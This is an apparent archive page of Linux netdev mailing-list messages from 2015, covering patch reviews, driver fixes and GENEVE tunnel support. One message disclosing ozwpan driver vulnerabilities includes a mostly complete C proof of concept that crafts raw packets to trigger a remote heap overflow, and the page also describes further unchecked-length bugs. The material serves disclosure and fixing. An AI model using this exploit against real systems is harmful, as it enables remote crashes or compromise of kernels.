Re: [PATCH -next] net: sched: use counter to break reclassify loops

2015-05-13 Thread Florian Westphal
Jamal Hadi Salim j...@mojatatu.com wrote:
 On 05/12/15 09:00, Florian Westphal wrote:
 Jamal Hadi Salim j...@mojatatu.com wrote:
 Florian,
 In general i am in support of removing this - since the use case never
 materialized as being useful. However, this is not the same logic that
 was there before. To get equivalency you need to pass the limit into
 tc_classify_compat() so it can be reset.
 
 AFAICS this re-set only happens when we return something other
 than RECLASSIFY which means the caller will not check the limit.
 
 So in fact it should be ok to remove this since the counter will always
 start from 0 on next tc_classify() invocation.
 
 
 Florian, consider the following scenario:
 Assume X is the max allowed reclassifies before bells start ringing.
 If we see up to X back-to-back reclassifies - we are very likely in
 a loop. We should see fire trucks arrive and bail out.
 If we see X-1 reclassifies followed by a pipe followed by
 X-1 reclassifies followed by ok then that looks like a healthy
 policy. But that is a total of 2X-2 reclassifies. You will
 bail out at X reclassifies; what i am saying is you shouldn't.
 And existing logic doesn't. Does that make sense?

Yes, but, if we use your example above then:

tc_classify called
  limit 0
tc_classify_compat called, ret RECLASSIFY
  limit 1
tc_classify_compat called, ret RECLASSIFY
  limit 2
tc_classify_compat called, ret PIPE (== 3)
  tc_classify returns 3
tc_classify called
  limit 0
  ...

So we don't toss skb since any return value other than RECLASSIFY
will make tc_classify() return to its caller, and when caller invokes
tc_classify again the limit variable is set to 0 again.
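
The trace above can be modelled in a few lines of userspace C. This is only a sketch of the argument, not the kernel code: classify_once() is a hypothetical stand-in for tc_classify_compat() that replays a scripted list of verdicts, and the limit of 4 is an assumed value for the maximum number of back-to-back reclassifies.

```c
#include <stddef.h>

/* Verdict values; PIPE == 3 matches the trace above. */
enum { ACT_OK = 0, ACT_RECLASSIFY = 1, ACT_SHOT = 2, ACT_PIPE = 3 };

#define DEMO_MAX_RECLASSIFY 4	/* assumed limit, "X" in the discussion */

/* Hypothetical stand-in for tc_classify_compat(): replays scripted verdicts. */
struct script {
	const int *verdicts;
	size_t len;
	size_t pos;
};

static int classify_once(struct script *s)
{
	return s->pos < s->len ? s->verdicts[s->pos++] : ACT_OK;
}

/*
 * Models one tc_classify() invocation. The counter is a local variable,
 * so it starts from 0 on every call and only counts back-to-back
 * RECLASSIFY verdicts within that call.
 */
static int classify(struct script *s)
{
	int limit = 0;

	for (;;) {
		int ret = classify_once(s);

		if (ret != ACT_RECLASSIFY)
			return ret;		/* caller sees the verdict */
		if (++limit >= DEMO_MAX_RECLASSIFY)
			return ACT_SHOT;	/* loop detected, drop */
	}
}
```

With X-1 reclassifies, a pipe, X-1 reclassifies and an ok, the first call returns PIPE and the second returns OK, so nothing is dropped even though 2X-2 reclassifies were seen in total.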

Does that make sense to you?

Thanks Jamal.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: gone with the spring cleanup..

2015-05-13 Thread Daniel Borkmann

On 05/13/2015 12:55 PM, Or Gerlitz wrote:

On 5/13/2015 1:42 PM, Jiri Pirko wrote:

Looks like the problem might be in named structures which are supposed to be
anonymous. Would you try the following patch:

oh, switchdev_obj_vlan and switchdev_obj_ipv4_fib is used in rocker..
So better:


nope, fails.. if I remove the union (so that struct switchdev_obj has struct vlan
and ipv4_fib fields) it works. Seems there's some problem also with anonymous
unions.


Yes, we once had such an issue here btw:

https://git.kernel.org/cgit/linux/kernel/git/davem/net-next.git/commit/lib/test_bpf.c?id=ece80490e2c1cefda018b2e5b96d4f39083d9096


[PATCH iproute2] man ip-link: Remove extra GROUP explanation

2015-05-13 Thread Vadim Kochan
From: Vadim Kochan vadi...@gmail.com

Remove double explanation of GROUP option from 'ip link set' section.

Signed-off-by: Vadim Kochan vadi...@gmail.com
---
 man/man8/ip-link.8.in | 8 +---
 1 file changed, 1 insertion(+), 7 deletions(-)

diff --git a/man/man8/ip-link.8.in b/man/man8/ip-link.8.in
index 823246f..714aab4 100644
--- a/man/man8/ip-link.8.in
+++ b/man/man8/ip-link.8.in
@@ -714,12 +714,6 @@ tool can be used. But it allows to change network namespace only for physical de
 give the device a symbolic name for easy reference.
 
 .TP
-.BI group  GROUP
-specify the group the device belongs to.
-The available groups are listed in file
-.BR @SYSCONFDIR@/group .
-
-.TP
 .BI vf  NUM
 specify a Virtual Function device to be configured. The associated PF device
 must be specified using the
@@ -867,7 +861,7 @@ specifies which help of link type to dislpay.
 .SS
 .I GROUP
 may be a number or a string from the file
-.B /etc/iproute2/group
+.B @SYSCONFDIR@/group
 which can be manually filled.
 
 .SH EXAMPLES
-- 
2.3.1



Re: [PATCH net-next] tcp/dccp: tw_timer_handler() is static

2015-05-13 Thread David Miller
From: Eric Dumazet eric.duma...@gmail.com
Date: Tue, 12 May 2015 06:22:56 -0700

 From: Eric Dumazet eduma...@google.com
 
 tw_timer_handler() is only used from net/ipv4/inet_timewait_sock.c
 
 Fixes: 789f558cfb36 ("tcp/dccp: get rid of central timewait timer")
 Signed-off-by: Eric Dumazet eduma...@google.com

Applied.


Re: [PATCH net-next] ipv4: __ip_local_out_sk() is static

2015-05-13 Thread David Miller
From: Eric Dumazet eric.duma...@gmail.com
Date: Tue, 12 May 2015 06:31:48 -0700

 From: Eric Dumazet eduma...@google.com
 
 __ip_local_out_sk() is only used from net/ipv4/ip_output.c
 
 net/ipv4/ip_output.c:94:5: warning: symbol '__ip_local_out_sk' was not
 declared. Should it be static?
 
 Fixes: 7026b1ddb6b8 ("netfilter: Pass socket pointer down through okfn().")
 Signed-off-by: Eric Dumazet eduma...@google.com

Applied.


Re: [PATCH v3 net-next 1/5] net: Get skb hash over flow_keys structure

2015-05-13 Thread David Miller
From: Tom Herbert t...@herbertland.com
Date: Tue, 12 May 2015 08:22:58 -0700

 @@ -15,6 +15,13 @@
   * All the members, except thoff, are in network byte order.
   */
  struct flow_keys {
 + u16 thoff;
 + u16 padding1;
 +#define FLOW_KEYS_HASH_START_FIELD   n_proto
 + __be16  n_proto;
 + u8  ip_proto;
 + u8  padding;
 +

This padding works if everyone consistently zero initializes the whole
key structure, but for whatever reason (performance, unintentional
oversight, etc.) not all paths do.

So, for example, inet_set_txhash() is going to have random crap in
keys.padding, so the hashes computed are not stable for a given flow
key tuple.

That's just the first code path I found with this issue, there are
probably several others.
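
A small userspace sketch of the problem, for illustration only. struct demo_keys is a made-up cut-down layout, not the real struct flow_keys, and FNV-1a stands in for the kernel's hash function. The point is just that any hash computed over a byte range that contains padding is only stable if that padding is always initialized.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical, simplified key layout with explicit padding fields. */
struct demo_keys {
	uint16_t thoff;
	uint16_t padding1;
	uint16_t n_proto;	/* hashing starts here */
	uint8_t  ip_proto;
	uint8_t  padding;
	uint32_t src;
	uint32_t dst;
};

/* FNV-1a over raw bytes; a stand-in, not the kernel's hash. */
static uint32_t hash_bytes(const uint8_t *p, size_t len)
{
	uint32_t h = 2166136261u;

	while (len--) {
		h ^= *p++;
		h *= 16777619u;
	}
	return h;
}

/* Hash everything from n_proto to the end, padding byte included. */
static uint32_t demo_hash(const struct demo_keys *k)
{
	size_t start = offsetof(struct demo_keys, n_proto);

	return hash_bytes((const uint8_t *)k + start, sizeof(*k) - start);
}

/* Fill in the same flow tuple; optionally zero the whole key first. */
static void demo_fill(struct demo_keys *k, int zero_first)
{
	if (zero_first)
		memset(k, 0, sizeof(*k));
	k->thoff = 20;
	k->n_proto = 0x0800;
	k->ip_proto = 6;
	k->src = 0x0a000001;
	k->dst = 0x0a000002;
}
```

Two keys filled with the same tuple hash identically only when demo_fill() is asked to zero the structure first; otherwise whatever was in k->padding leaks into the hash.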


[PATCH 1/4] ozwpan: Use proper check to prevent heap overflow

2015-05-13 Thread Jason A. Donenfeld
Since elt->length is a u8, we can make this variable a u8. Then we can
do proper bounds checking more easily. Without this, a potentially
negative value is passed to the memcpy inside oz_hcd_get_desc_cnf,
resulting in a remotely exploitable heap overflow with network
supplied data.
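
A minimal sketch of the class of bug, assuming a made-up header size (DEMO_HDR_LEN) and made-up helper names; it is not the driver code. It shows how a length computed with signed arithmetic goes negative for a short element and then becomes a huge size when handed to memcpy, and how checking the u8 against the header size first avoids that.

```c
#include <stddef.h>
#include <stdint.h>

#define DEMO_HDR_LEN 7	/* hypothetical fixed header size inside the element */

/* Buggy pattern: the subtraction is done in int and may go negative. */
static int demo_payload_len_unchecked(uint8_t elt_length)
{
	return elt_length - DEMO_HDR_LEN;
}

/* What memcpy() would see as its size argument in the buggy case. */
static size_t demo_copy_len_unchecked(uint8_t elt_length)
{
	return (size_t)demo_payload_len_unchecked(elt_length);
}

/*
 * Checked pattern: reject elements shorter than the header before
 * subtracting, and keep the result in a u8.
 * Returns 0 and stores the payload length on success, -1 otherwise.
 */
static int demo_payload_len_checked(uint8_t elt_length, uint8_t *out)
{
	if (elt_length < DEMO_HDR_LEN)
		return -1;
	*out = (uint8_t)(elt_length - DEMO_HDR_LEN);
	return 0;
}
```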

This could result in remote code execution. A PoC which obtains DoS
follows below. It requires the ozprotocol.h file from this module.

=-=-=-=-=-=

 #include <arpa/inet.h>
 #include <linux/if_packet.h>
 #include <net/if.h>
 #include <netinet/ether.h>
 #include <stdio.h>
 #include <string.h>
 #include <stdlib.h>
 #include <endian.h>
 #include <sys/ioctl.h>
 #include <sys/socket.h>

 #define u8 uint8_t
 #define u16 uint16_t
 #define u32 uint32_t
 #define __packed __attribute__((__packed__))
 #include "ozprotocol.h"

static int hex2num(char c)
{
	if (c >= '0' && c <= '9')
		return c - '0';
	if (c >= 'a' && c <= 'f')
		return c - 'a' + 10;
	if (c >= 'A' && c <= 'F')
		return c - 'A' + 10;
	return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
	int i;
	for (i = 0; i < 6; i++) {
		int a, b;
		a = hex2num(*txt++);
		if (a < 0)
			return -1;
		b = hex2num(*txt++);
		if (b < 0)
			return -1;
		*addr++ = (a << 4) | b;
		if (i < 5 && *txt++ != ':')
			return -1;
	}
	return 0;
}

int main(int argc, char *argv[])
{
	if (argc < 3) {
		fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
		return 1;
	}

	uint8_t dest_mac[6];
	if (hwaddr_aton(argv[2], dest_mac)) {
		fprintf(stderr, "Invalid mac address.\n");
		return 1;
	}

	int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
	if (sockfd < 0) {
		perror("socket");
		return 1;
	}

	struct ifreq if_idx;
	int interface_index;
	strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
	if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
		perror("SIOCGIFINDEX");
		return 1;
	}
	interface_index = if_idx.ifr_ifindex;
	if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
		perror("SIOCGIFHWADDR");
		return 1;
	}
	uint8_t *src_mac = (uint8_t *)if_idx.ifr_hwaddr.sa_data;

	struct {
		struct ether_header ether_header;
		struct oz_hdr oz_hdr;
		struct oz_elt oz_elt;
		struct oz_elt_connect_req oz_elt_connect_req;
	} __packed connect_packet = {
		.ether_header = {
			.ether_type = htons(OZ_ETHERTYPE),
			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
		},
		.oz_hdr = {
			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
			.last_pkt_num = 0,
			.pkt_num = htole32(0)
		},
		.oz_elt = {
			.type = OZ_ELT_CONNECT_REQ,
			.length = sizeof(struct oz_elt_connect_req)
		},
		.oz_elt_connect_req = {
			.mode = 0,
			.resv1 = {0},
			.pd_info = 0,
			.session_id = 0,
			.presleep = 35,
			.ms_isoc_latency = 0,
			.host_vendor = 0,
			.keep_alive = 0,
			.apps = htole16((1 << OZ_APPID_USB) | 0x1),
			.max_len_div16 = 0,
			.ms_per_isoc = 0,
			.up_audio_buf = 0,
			.ms_per_elt = 0
		}
	};

	struct {
		struct ether_header ether_header;
		struct oz_hdr oz_hdr;
		struct oz_elt oz_elt;
		struct oz_get_desc_rsp oz_get_desc_rsp;
	} __packed pwn_packet = {
		.ether_header = {
			.ether_type = htons(OZ_ETHERTYPE),
			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
		},
		.oz_hdr = {
			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
			.last_pkt_num = 0,
			.pkt_num = htole32(1)
		},
		.oz_elt = {
			.type =

Re: [oss-security] [PATCH 0/4] ozwpan: Four remote packet-of-death vulnerabilities

2015-05-13 Thread Greg KH
On Wed, May 13, 2015 at 08:33:30PM +0200, Jason A. Donenfeld wrote:
 The ozwpan driver accepts network packets, parses them, and converts
 them into various USB functionality. There are numerous security
 vulnerabilities in the handling of these packets. Two of them result in
 a memcpy(kernel_buffer, network_packet, -length), one of them is a
 divide-by-zero, and one of them is a loop that decrements -1 until it's
 zero.
 
 I've written a very simple proof-of-concept for each one of these
 vulnerabilities to aid with detecting and fixing them. The general
 operation of each proof-of-concept code is:
 
   - Load the module with:
 # insmod ozwpan.ko g_net_dev=eth0
   - Compile the PoC with ozprotocol.h from the kernel tree:
 $ cp /path/to/linux/drivers/staging/ozwpan/ozprotocol.h ./
 $ gcc ./poc.c -o ./poc
   - Run the PoC:
 # ./poc eth0 [mac-address]
 
 These PoCs should also be useful to the maintainers for testing out
 constructing and sending various other types of malformed packets against
 which this driver should be hardened.
 
 Please assign CVEs for these vulnerabilities. I believe the first two
 patches of this set can receive one CVE for both, and the remaining two
 can receive one CVE each.
 
 
 On a slightly related note, there are several other vulnerabilities in
 this driver that are worth looking into. When ozwpan receives a packet,
 it casts the packet into a variety of different structs, based on the
 value of type and length parameters inside the packet. When making these
 casts, and when reading bytes based on this length parameter, the actual
 length of the packet in the socket buffer is never actually consulted. As
 such, it's very likely that a packet could be sent that results in the
 kernel reading memory in adjacent buffers, resulting in an information
 leak, or from unpaged addresses, resulting in a crash. In the former case,
 it may be possible with certain message types to actually send these
 leaked adjacent bytes back to the sender of the packet. So, I'd highly
 recommend the maintainers of this driver go branch-by-branch from the
 initial rx function, adding checks to ensure all reads and casts are
 within the bounds of the socket buffer.
 
 Jason A. Donenfeld (4):
   ozwpan: Use proper check to prevent heap overflow
   ozwpan: Use unsigned ints to prevent heap overflow
   ozwpan: divide-by-zero leading to panic
   ozwpan: unchecked signed subtraction leads to DoS
 
  drivers/staging/ozwpan/ozhcd.c |  8 
  drivers/staging/ozwpan/ozusbif.h   |  4 ++--
  drivers/staging/ozwpan/ozusbsvc1.c | 11 +--
  3 files changed, 15 insertions(+), 8 deletions(-)

Any reason you didn't cc: the maintainer who could actually apply these
to the kernel tree?

Please use scripts/get_maintainer.pl to properly notify the correct
people.

thanks,

greg k-h


Re: [patch -next] net: macb: OR vs AND typos

2015-05-13 Thread David Miller
From: Dan Carpenter dan.carpen...@oracle.com
Date: Tue, 12 May 2015 21:15:24 +0300

 The bitwise tests are always true here because it uses '|' where '&' is
 intended.
 
 Fixes: 98b5a0f4a228 ('net: macb: Add support for jumbo frames')
 Signed-off-by: Dan Carpenter dan.carpen...@oracle.com

Applied, thanks.
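
For readers skimming the archive, a tiny sketch of why such a test is always true. DEMO_CAP_JUMBO is a made-up capability bit used only for illustration, not a macb constant.

```c
#include <stdbool.h>
#include <stdint.h>

#define DEMO_CAP_JUMBO 0x00000010u	/* hypothetical capability bit */

/* Typo version: OR-ing in a non-zero constant can never yield zero. */
static bool has_jumbo_buggy(uint32_t caps)
{
	return (caps | DEMO_CAP_JUMBO) != 0;
}

/* Intended version: AND masks out everything except the bit under test. */
static bool has_jumbo_fixed(uint32_t caps)
{
	return (caps & DEMO_CAP_JUMBO) != 0;
}
```

has_jumbo_buggy(0) reports the capability even though no bit is set, while has_jumbo_fixed(0) does not.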


Re: [PATCH -next] net: sched: use counter to break reclassify loops

2015-05-13 Thread David Miller
From: Florian Westphal f...@strlen.de
Date: Mon, 11 May 2015 19:50:41 +0200

 Seems all we want here is to avoid endless 'goto reclassify' loop.
 tc_classify_compat even resets this counter when something other
 than TC_ACT_RECLASSIFY is returned, so this skb-counter doesn't
 break hypothetical loops induced by something other than perpetual
 TC_ACT_RECLASSIFY return values.
 
 skb_act_clone is now identical to skb_clone, so just use that.
 
 Tested with following (bogus) filter:
 tc filter add dev eth0 parent : \
  protocol ip u32 match u32 0 0 police rate 10Kbit burst \
  64000 mtu 1500 action reclassify
 
 Acked-by: Daniel Borkmann dan...@iogearbox.net
 Signed-off-by: Florian Westphal f...@strlen.de

Applied, thanks everyone.


Re: [PATCH net-next,1/1] hv_netvsc: use per_cpu stats to calculate TX/RX data

2015-05-13 Thread David Miller
From: six...@microsoft.com
Date: Tue, 12 May 2015 15:50:02 -0700

 From: Simon Xiao six...@microsoft.com
 
 Current code does not lock anything when calculating the TX and RX stats.
 As a result, the RX and TX data reported by ifconfig are not accurate in a
 system with high network throughput and multiple CPUs (in my test,
 RX/TX = 83% between 2 HyperV VM nodes which have 8 vCPUs and 40G Ethernet).
 
 This patch fixes the above issue by using per_cpu stats.
 netvsc_get_stats64() summarizes TX and RX data by iterating over all CPUs
 to get their respective stats.
 
 Signed-off-by: Simon Xiao six...@microsoft.com
 Reviewed-by: K. Y. Srinivasan k...@microsoft.com
 Reviewed-by: Haiyang Zhang haiya...@microsoft.com
 ---
  drivers/net/hyperv/hyperv_net.h |  9 +
  drivers/net/hyperv/netvsc_drv.c | 80 
 -
  2 files changed, 81 insertions(+), 8 deletions(-)
 
 diff --git a/drivers/net/hyperv/hyperv_net.h b/drivers/net/hyperv/hyperv_net.h
 index 41071d3..5a92b36 100644
 --- a/drivers/net/hyperv/hyperv_net.h
 +++ b/drivers/net/hyperv/hyperv_net.h
 @@ -611,6 +611,12 @@ struct multi_send_data {
   u32 count; /* counter of batched packets */
  };
  
 +struct netvsc_stats {
 + u64 packets;
 + u64 bytes;
 + struct u64_stats_sync s_sync;
 +};
 +
  /* The context of the netvsc device  */
  struct net_device_context {
   /* point back to our device context */
 @@ -618,6 +624,9 @@ struct net_device_context {
   struct delayed_work dwork;
   struct work_struct work;
   u32 msg_enable; /* debug level */
 +
 + struct netvsc_stats __percpu *tx_stats;
 + struct netvsc_stats __percpu *rx_stats;
  };
  
  /* Per netvsc device */
 diff --git a/drivers/net/hyperv/netvsc_drv.c b/drivers/net/hyperv/netvsc_drv.c
 index 5993c7e..310b902 100644
 --- a/drivers/net/hyperv/netvsc_drv.c
 +++ b/drivers/net/hyperv/netvsc_drv.c
 @@ -391,7 +391,7 @@ static int netvsc_start_xmit(struct sk_buff *skb, struct net_device *net)
   u32 skb_length;
   u32 pkt_sz;
   struct hv_page_buffer page_buf[MAX_PAGE_BUFFER_COUNT];
 -
 + struct netvsc_stats *tx_stats = this_cpu_ptr(net_device_ctx->tx_stats);
  
   /* We will atmost need two pages to describe the rndis
* header. We can only transmit MAX_PAGE_BUFFER_COUNT number
 @@ -580,8 +580,10 @@ do_send:
  
  drop:
   if (ret == 0) {
 - net->stats.tx_bytes += skb_length;
 - net->stats.tx_packets++;
 + u64_stats_update_begin(&tx_stats->s_sync);
 + tx_stats->packets++;
 + tx_stats->bytes += skb_length;
 + u64_stats_update_end(&tx_stats->s_sync);
   } else {
   if (ret != -EAGAIN) {
   dev_kfree_skb_any(skb);
 @@ -644,13 +646,17 @@ int netvsc_recv_callback(struct hv_device *device_obj,
   struct ndis_tcp_ip_checksum_info *csum_info)
  {
   struct net_device *net;
 + struct net_device_context *net_device_ctx;
   struct sk_buff *skb;
 + struct netvsc_stats *rx_stats;
  
   net = ((struct netvsc_device *)hv_get_drvdata(device_obj))->ndev;
   if (!net || net->reg_state != NETREG_REGISTERED) {
   packet->status = NVSP_STAT_FAIL;
   return 0;
   }
 + net_device_ctx = netdev_priv(net);
 + rx_stats = this_cpu_ptr(net_device_ctx->rx_stats);
  
   /* Allocate a skb - TODO direct I/O to pages? */
   skb = netdev_alloc_skb_ip_align(net, packet->total_data_buflen);
 @@ -686,8 +692,10 @@ int netvsc_recv_callback(struct hv_device *device_obj,
   skb_record_rx_queue(skb, packet->channel->
   offermsg.offer.sub_channel_index);
  
 - net->stats.rx_packets++;
 - net->stats.rx_bytes += packet->total_data_buflen;
 + u64_stats_update_begin(&rx_stats->s_sync);
 + rx_stats->packets++;
 + rx_stats->bytes += packet->total_data_buflen;
 + u64_stats_update_end(&rx_stats->s_sync);
  
   /*
* Pass the skb back up. Network stack will deallocate the skb when it
 @@ -753,6 +761,46 @@ static int netvsc_change_mtu(struct net_device *ndev, int mtu)
   return 0;
  }
  
 +static struct rtnl_link_stats64 *netvsc_get_stats64(struct net_device *net,
 + struct rtnl_link_stats64 *t)
 +{
 + struct net_device_context *ndev_ctx = netdev_priv(net);
 + int cpu;
 +
 + for_each_possible_cpu(cpu) {
 + struct netvsc_stats *tx_stats = per_cpu_ptr(ndev_ctx->tx_stats,
 + cpu);
 + struct netvsc_stats *rx_stats = per_cpu_ptr(ndev_ctx->rx_stats,
 + cpu);
 + u64 tx_packets, tx_bytes, rx_packets, rx_bytes;
 + unsigned int start;
 +
 + do {
 + start = u64_stats_fetch_begin_irq(&tx_stats->s_sync);
 + tx_packets = tx_stats->packets;
 + 
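
The quoted diff is cut off above. As a rough userspace illustration of the per-CPU idea only (not the driver code): each CPU updates its own slot, and the reader sums all slots on demand. DEMO_NR_CPUS and the demo_* names are assumptions, and the u64_stats_sync sequence protection used by the patch is deliberately left out of this sketch.

```c
#include <stdint.h>

#define DEMO_NR_CPUS 4	/* assumed CPU count for the sketch */

struct demo_stats {
	uint64_t packets;
	uint64_t bytes;
};

/* One slot per CPU, so writers on different CPUs never share a counter. */
static struct demo_stats demo_tx[DEMO_NR_CPUS];

/* Fast path: account one transmitted packet on the given CPU's slot. */
static void demo_account_tx(unsigned int cpu, uint64_t len)
{
	demo_tx[cpu].packets++;
	demo_tx[cpu].bytes += len;
}

/* Slow path: walk every slot and add the counters up. */
static struct demo_stats demo_sum_tx(void)
{
	struct demo_stats total = { 0, 0 };
	unsigned int cpu;

	for (cpu = 0; cpu < DEMO_NR_CPUS; cpu++) {
		total.packets += demo_tx[cpu].packets;
		total.bytes += demo_tx[cpu].bytes;
	}
	return total;
}
```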

Re: [PATCH] vlan: Correctly propagate promisc|allmulti flags in notifier.

2015-05-13 Thread David Miller
From: Vladislav Yasevich vyasev...@gmail.com
Date: Tue, 12 May 2015 20:53:14 -0400

 Currently vlan notifier handler will try to update all vlans
 for a device when that device comes up.  A problem occurs,
 however, when the vlan device was set to promiscuous, but not
 by the user (ex: a bridge).  In that case, dev->gflags are
 not updated.  What results is that the lower device ends
 up with an extra promiscuity count.  Here are the
 backtraces that prove this:
 ...
 The above comes from the setting the vlan device to IFF_UP state.
 ...
 And this one comes from the notification code.  What we end
 up with is a vlan with promiscuity count of 1 and a physical
 device with a promiscuity count of 2.  They should both have
 a count of 1.
 
 To resolve this issue, vlan code can use dev_get_flags() api
 which correctly masks promiscuity and allmulti flags.

Applied, thanks Vlad.

 Sign-off-by: Vlad Yasevich vyase...@redhat.com

Note, it's Signed-off-by: not Sign-off-by: I fixed this for
you.


Re: [PATCH 0/5 net-next] Netfilter ingress support (v4)

2015-05-13 Thread David Miller
From: Pablo Neira Ayuso pa...@netfilter.org
Date: Wed, 13 May 2015 18:19:33 +0200

 This is the v4 round of patches to add the Netfilter ingress hook, it basically
 comes in two steps:
 ...
 Please, apply. Thanks.

Series applied, thanks Pablo.


Re: [PATCH 5/5] netfilter: add netfilter ingress hook after handle_ing() under unique static key

2015-05-13 Thread David Miller
From: Nicolas Dichtel nicolas.dich...@6wind.com
Date: Wed, 13 May 2015 21:36:25 +0200

 Le 13/05/2015 18:19, Pablo Neira Ayuso a écrit :
 [snip]
 --- /dev/null
 +++ b/include/linux/netfilter_ingress.h
 [snip]
 +static inline void nf_hook_ingress_init(struct net_device *dev)
 +{
 +INIT_LIST_HEAD(&dev->nf_hooks_ingress);
 nit: this line is indented with spaces instead of a tab.

I took care of this when I applied Pablo's series.

Thanks.


Re: [PATCH net-next v2 0/2] sfc: Bowdlerise PTP MCDI errors

2015-05-13 Thread David Miller
From: Edward Cree ec...@solarflare.com
Date: Tue, 12 May 2015 13:03:27 +0100

 When the NIC doesn't support PTP, probe-time MCDI commands fail in
 predictable ways.  Instead of logging cryptic MCDI errors, just log that
 PTP isn't supported.
 
 v2: Hopefully stop Thunderbird mangling the patches.

Series applied, thanks.


Re: [PATCH net-next] net: kill useless net_*_ingress_queue() definitions when NET_CLS_ACT is unset

2015-05-13 Thread David Miller
From: Pablo Neira Ayuso pa...@netfilter.org
Date: Tue, 12 May 2015 20:28:07 +0200

 This fixes 4577139b2dabf589 ("net: use jump label patching for ingress qdisc in
 __netif_receive_skb_core").
 
 The only client of this is sch_ingress and it depends on NET_CLS_ACT. So
 there is no way these definitions can be of any help.
 
 Cc: Daniel Borkmann dan...@iogearbox.net
 Signed-off-by: Pablo Neira Ayuso pa...@netfilter.org

Applied, thanks Pablo.


Re: [PATCH v3] add GENEVE netdev tunnel driver

2015-05-13 Thread David Miller
From: John W. Linville linvi...@tuxdriver.com
Date: Wed, 13 May 2015 12:57:25 -0400

 This 5-patch kernel series adds a netdev implementation of a GENEVE
 tunnel driver, and the single iproute2 patch enables creation and
 such for those netdevs.  This makes use of the existing GENEVE
 infrastructure already used by the OVS code.  The net/ipv4/geneve.c
 file is renamed as net/ipv4/geneve_core.c as part of these changes.
 ...
 The overall structure of the GENEVE netdev driver is strongly
 influenced by the VXLAN netdev driver.  This is not surprising, as the
 two drivers are intended to serve similar purposes.  As development of
 the GENEVE driver continues, it is likely that those similarities will
 grow stronger.  This will include both simple configuration options
 (e.g. TOS and TTL settings) and new control plane support.
 
 The current implementation is very simple, restricting itself to point
 to point links over IPv4.  This is due only to the simplicity of the
 implementation, and no such limit is inherent to GENEVE in any way.
 Support for IPv6 links and more sophisticated control plane options
 are predictable enhancements.
 
 Using the included iproute2 patch, a GENEVE tunnel is created thusly:
 
 ip link add dev gnv0 type geneve remote 192.168.22.1 vni 1234
 ip link set gnv0 up
 ip addr add 10.1.1.1/24 dev gnv0
 
 After a corresponding tunnel interface is created at the link partner,
 traffic should proceed as expected.
 
 Please let me know if anyone has problems...thanks!

Looks good, series applied, thanks John!


Re: [PATCH net 1/2] ipv6: do not delete previously existing ECMP routes if add fails

2015-05-13 Thread Michal Kubecek
On Wed, May 13, 2015 at 06:30:20AM -0700, roopa wrote:
 
 This looks like a similar bug i was trying to fix some time back:
 http://patchwork.ozlabs.org/patch/362296/
 
 (I am not sure if my full patch is still valid. I was thinking of
 re-spinning it sometime soon. If you are interested in trying it out,
 please do)

It's essentially the same idea but I prefer to use variable remaining
which is already there and is needed anyway rather than introduce
three extra variables for the cleanup (which is quite similar to the
suggestion from Hannes' reply).

I've sent v2 a few minutes ago.

   Michal Kubecek



Re: [patch net-next v3 00/15] introduce programable flow dissector and cls_flower

2015-05-13 Thread David Miller
From: Jiri Pirko j...@resnulli.us
Date: Tue, 12 May 2015 14:56:06 +0200

 Per Davem's request, I prepared this patchset which introduces programmable
 flow dissector. For current users of flow_keys, there is a wrapper
 skb_flow_dissect_flow_keys which maintains the previous behaviour.
 For purposes of cls_flower, couple of new dissection keys were introduced.
 
 Note that this dissector can be also eventually used by openvswitch code.
 
 Also, as a next step, I plan to get rid of *skb_flow_get_ports(export)
 and *__skb_get_poff as their functionality can be now implemented by
 skb_flow_dissect as well.
 
 v2->v3:
 - remove TCA_FLOWER_POLICE attr suggested by Jamal
 
 v1->v2:
 - move __skb_tx_hash rather to dev.c as suggested by Alex

Ok, assuming this passes all of my build tests, I'll push this into
net-next.

I'm sure there will be some performance improvements possible, and I
hope you will look into making sure this new programmable classifier
is as light weight as possible.

Anyways, thanks a lot.


Re: [PATCH net-next v3 0/6] refine rollover

2015-05-13 Thread David Miller
From: Willem de Bruijn will...@google.com
Date: Tue, 12 May 2015 11:56:44 -0400

 From: Willem de Bruijn will...@google.com
 
 refine packet socket rollover:
 
 1. mitigate a case of lock contention
 2. avoid exporting resource exhaustion to other sockets,
by migrating only to a victim socket that has ample room
 3. avoid reordering of most flows on the socket,
by migrating first the flow responsible for load imbalance
 4. help processes detect load imbalance,
by exporting rollover counters
 
 Context: rollover implements flow migration in packet socket fanout
 groups in case of extreme load imbalance. It is a specific
 implementation of migration that minimizes reordering by selecting
 the same victim socket when possible (and by selecting subsequent
 victims in a round robin fashion, from which its name derives).

The user API looks a lot better now, series applied, thanks Willem.


Re: [net-next PATCH] net: Reserve skb headroom and set skb->dev even if using __alloc_skb

2015-05-13 Thread David Miller
From: Alexander Duyck alexander.h.du...@redhat.com
Date: Wed, 13 May 2015 13:34:13 -0700

 When I had inlined __alloc_rx_skb into __netdev_alloc_skb and
 __napi_alloc_skb I had overlooked the fact that there was a return in the
 __alloc_rx_skb.  As a result we weren't reserving headroom or setting the
 skb->dev in certain cases.  This change corrects that by adding a couple of
 jump labels to jump to depending on __alloc_skb either succeeding or failing.
 
 Fixes: 9451980a6646 ("net: Use cached copy of pfmemalloc to avoid accessing page")
 Reported-by: Felipe Balbi ba...@ti.com
 Signed-off-by: Alexander Duyck alexander.h.du...@redhat.com

Applied, thanks.


[RFC PATCH 0/4] Make iSCSI network namespace aware

2015-05-13 Thread Chris Leech
I've had a few reports of people trying to run iscsid in a container, which
